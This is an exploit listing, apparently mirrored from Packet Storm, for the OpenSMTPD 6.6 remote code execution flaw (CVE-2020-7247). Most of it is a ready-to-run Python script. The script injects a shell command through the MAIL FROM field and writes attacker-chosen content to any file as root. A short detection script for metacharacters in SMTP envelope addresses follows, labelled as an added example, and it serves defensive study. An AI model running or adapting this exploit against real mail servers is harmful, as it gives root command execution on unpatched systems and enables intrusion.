
OpenBSD OpenSMTPD 6.6 Remote Code Execution

06 Apr 2021 | Reported by Tobias Marcotto | Type: packetstorm | Source: packetstormsecurity.com

OpenBSD OpenSMTPD 6.6 Remote Code Execution Vulnerability

Code
`# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability  
# Date: 05/04/2021  
# Exploit Author: Tobias Marcotto  
# Tested on: Kali Linux x64  
# Version: 6.6  
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.  
# CVE : CVE-2020-7247  
  
  
*********************************************************************************************************  
  
  
import socket, time  
import sys  
  
HOST = input("what is the ip address of the host?: ")   
PORT = 25 # The same port as used by the server  
s = None  
  
writeto = input("Which file do you want to write to?: ")#raw inputen  
writewhat = input("What do you want to write to the file?: ")  
payload = b"""\r\n  
#0\r\n  
#1\r\n  
#2\r\n  
#3\r\n  
#4\r\n  
#5\r\n  
#6\r\n  
#7\r\n  
#8\r\n  
#9\r\n  
#a\r\n  
#b\r\n   
#c\r\n  
#d\r\n  
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""  
.  
"""  
  
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):  
af, socktype, proto, canonname, sa = res  
try:  
s = socket.socket(af, socktype, proto)  
except OSError as msg:  
s = None  
continue  
try:  
s.connect(sa)  
except OSError as msg:  
s.close()  
s = None  
continue  
break  
if s is None:  
print('could not open socket')  
sys.exit(1)  
with s:  
data = s.recv(1024)  
print('Received', repr(data))  
time.sleep(1)  
print('sending')  
s.send(b"helo test.com\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")  
time.sleep(1)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"RCPT TO:<root>\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"DATA\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(payload)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"QUIT\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
print("done")  
s.close()  
`
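
A defensive check for the pattern the description names (shell metacharacters in a MAIL FROM field), as an added example that is not part of the original exploit or of OpenSMTPD: it scans SMTP command lines, for instance from a proxy or session log, and flags envelope addresses that contain shell metacharacters. The metacharacter set, the function names and the sample lines are assumptions constructed for this example.

```python
import re

# Characters that let a shell chain, pipe, redirect or substitute commands.
# Assumption for this example: this is a detection heuristic, not the
# character list OpenSMTPD itself validates against.
SHELL_META = set(";|&`$()<> \t\r\n")

# SMTP envelope commands; the greedy group keeps everything up to the last '>'.
ENVELOPE_RE = re.compile(r"^\s*(MAIL\s+FROM|RCPT\s+TO)\s*:\s*<(.*)>", re.I)


def suspicious_envelope(line):
    """Return (command, address, bad_chars) when the envelope address in
    `line` contains shell metacharacters, otherwise None."""
    m = ENVELOPE_RE.match(line)
    if not m:
        return None
    command = " ".join(m.group(1).upper().split())  # normalise case/spacing
    address = m.group(2)
    bad = sorted(set(address) & SHELL_META)
    return (command, address, bad) if bad else None


def scan(lines):
    """Return every suspicious envelope command found in an iterable of lines."""
    return [hit for hit in map(suspicious_envelope, lines) if hit]


# Constructed sample session lines (not captured traffic).
SAMPLE_SESSION = [
    "HELO client.example",
    "MAIL FROM:<alice@example.org>",
    "MAIL FROM:<bob@example.org> SIZE=1024",
    "MAIL FROM:<>",            # empty reverse-path (bounce), legitimate
    "RCPT TO:<root>",
    "MAIL FROM:<;true;>",      # metacharacters in the sender address
]

if __name__ == "__main__":
    for command, address, bad in scan(SAMPLE_SESSION):
        print(f"{command} address {address!r} contains {bad}")
```

Some of these characters are legal in RFC 5321 local parts, so treat a hit as a lead to review alongside the server's patch level rather than as proof of exploitation.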
